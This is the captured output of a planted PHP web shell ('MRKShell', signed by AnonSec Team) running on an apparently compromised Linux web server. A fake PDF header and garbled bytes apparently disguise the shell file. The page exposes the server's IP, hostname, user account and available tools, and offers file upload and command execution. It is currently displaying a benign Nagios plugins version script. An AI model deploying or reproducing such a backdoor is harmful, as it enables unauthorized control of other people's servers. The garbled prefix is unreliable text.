...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY MR K IS HERE
MRKShell
Server IP : 65.108.66.160  /  Your IP : 216.73.217.50
Web Server : Apache
System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64
User : alasaweborg ( 1047)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /nagios_install/nagios-plugins-2.4.6/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /nagios_install/nagios-plugins-2.4.6/NP-VERSION-GEN
#!/bin/sh
#
# This is from the Git repository (GIT-VERSION-GEN with modifications)
#

SRC_ROOT=`dirname $0`

NPVF=NP-VERSION-FILE
DEF_VER=2.4.6.git

LF='
'

# First try git-describe, then svn info, then default.
if test -d $SRC_ROOT/.git -o -f $SRC_ROOT/.git &&
	VN=`cd $SRC_ROOT; git describe --abbrev=4 HEAD 2>/dev/null` &&
	case "$VN" in
	*$LF*) (exit 1) ;;
	release-[0-9]*)
		git update-index -q --refresh
		test -z "`git diff-index --name-only HEAD --`" ||
		VN="$VN-dirty" 
		echo $VN;;
	esac
then
	VN=`echo "$VN" | sed -e 's/^release-//' | sed -e 's/-/./g'`;
#elif test -d $SRC_ROOT/.svn -o -f $SRC_ROOT/.svn &&
#	VN=`cd $SRC_ROOT; svn info 2>/dev/null | grep '^Revision'` &&
#	case "$VN" in
#	*$LF*) (exit 1) ;;
#	Revision:*)
#		VN=`echo $VN | awk '{print $NF}'`
#		test "`svn status 2>/dev/null | grep '^[AMD]' | wc -l | tr -d ' '`" = 0 ||
#		VN="$VN-dirty" ;;
#	esac
#then
#	VN=`echo "trunk.$VN" | sed -e 's/-/./g'`;
else
	VN="$DEF_VER"
fi

VN=`expr "$VN" : v*'\(.*\)'`

if test -r $NPVF
then
	VC=`sed -e 's/^NP_VERSION = //' <$NPVF`
else
	VC=unset
fi
echo "$VN"
test "$VN" = "$VC" || {
	echo >&2 "NP_VERSION = $VN"
	echo "NP_VERSION = $VN" >$NPVF
}


Anon7 - 2022
AnonSec Team